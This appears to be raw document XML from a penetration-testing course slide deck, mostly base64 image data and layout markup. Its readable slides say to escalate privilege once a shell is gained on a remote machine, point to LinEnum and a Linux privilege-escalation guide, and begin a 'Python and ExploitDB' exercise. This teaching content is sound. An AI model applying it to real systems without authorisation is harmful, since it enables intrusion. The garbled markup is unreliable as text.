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&#10;g4ZkHimQeSZvX+R/AA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BQ&#10;dj6Q1gIAAMwGAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAA&#10;IQD+WfqWOisAADorAAAUAAAAAAAAAAAAAAAAAD8FAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQIt&#10;ABQABgAIAAAAIQBUhTsR4gAAAA0BAAAPAAAAAAAAAAAAAAAAAKswAABkcnMvZG93bnJldi54bWxQ&#10;SwECLQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAAC6MQAAZHJzL19yZWxzL2Uy&#10;b0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAACrMgAAAAA=&#10;">
                <v:shape id="Picture 340853" o:spid="_x0000_s1070" type="#_x0000_t75" style="position:absolute;width:19335;height:26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TpyxgAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RagIx&#10;FETfC/5DuIJvNavWYlejqCjYh1Kq/YBLcs0ubm7WTVy3f28KhT4OM3OGWaw6V4mWmlB6VjAaZiCI&#10;tTclWwXfp/3zDESIyAYrz6TghwKslr2nBebG3/mL2mO0IkE45KigiLHOpQy6IIdh6Gvi5J194zAm&#10;2VhpGrwnuKvkOMtepcOS00KBNW0L0pfjzSkgrd9Pn2vbtjZutruPKb6Nw1WpQb9bz0FE6uJ/+K99&#10;MAomL9lsOoHfP+kLyOUDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAETk6csYAAADfAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId202" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 280584" o:spid="_x0000_s1071" style="position:absolute;left:19431;top:25717;width:2533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z8TyAAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6azaVKjG6irQVPWospN4e2dckNPs2ZFcT++u7guBxmJlvmPlyMI04U+dqywpeoxgE&#10;cWF1zaWCr8P6JQHhPLLGxjIpuJCD5eLxYY6ptj3v6Zz5UgQIuxQVVN63qZSuqMigi2xLHLwf2xn0&#10;QXal1B32AW4aOYrjiTRYc1iosKX3iorf7GQUbJJ29b21f33ZfB43+S6ffhymXqnnp2E1A+Fp8Pfw&#10;rb3VCkZJPE7e4PonfAG5+AcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDD9z8TyAAAAN8A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="338872FF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:t>Oct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sz w:val="56"/>
        </w:rPr>
        <w:t>Now what?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06716845" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB0195B" wp14:editId="14C9670B">
            <wp:extent cx="8686800" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340854" name="Picture 3408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54" name="Picture 340854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CCFF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="8918"/>
          <w:tab w:val="right" w:pos="17835"/>
        </w:tabs>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="-585"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ultimately, try to escalate your privilege.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D82C034" wp14:editId="6C144F00">
            <wp:extent cx="1447800" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="291665" name="Picture 291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65" name="Picture 291665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39BD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="445" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="74"/>
        </w:rPr>
        <w:t>Privilege Escalation can be done in many, many ways.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4385DF1A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="339" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Outlets for privilege escalation will be visited in future iterations of this course.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CCC150" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="198" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You could use another exploit, take advantage of different services, abuse some misconfiguration . the list goes on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2720DDE0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="205" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>If you are interested, explore these resources to get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve"> a better idea of what to do next once you have a shell on a remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC9C9D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/rebootuser/LinEnum https://blog.g0tmi1 k.com/201 1 /08/basic-lin ux-privilege-escalation/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A411365" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="16350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6227911C" wp14:editId="22F6BE68">
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="292317" name="Picture 292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17" name="Picture 292317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D3CB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15540" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EF37073" wp14:editId="0C2DCF5C">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="292381" name="Picture 292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81" name="Picture 29238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053D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="93"/>
        <w:ind w:left="445"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exercise: Python and ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0710BD9F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="415" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
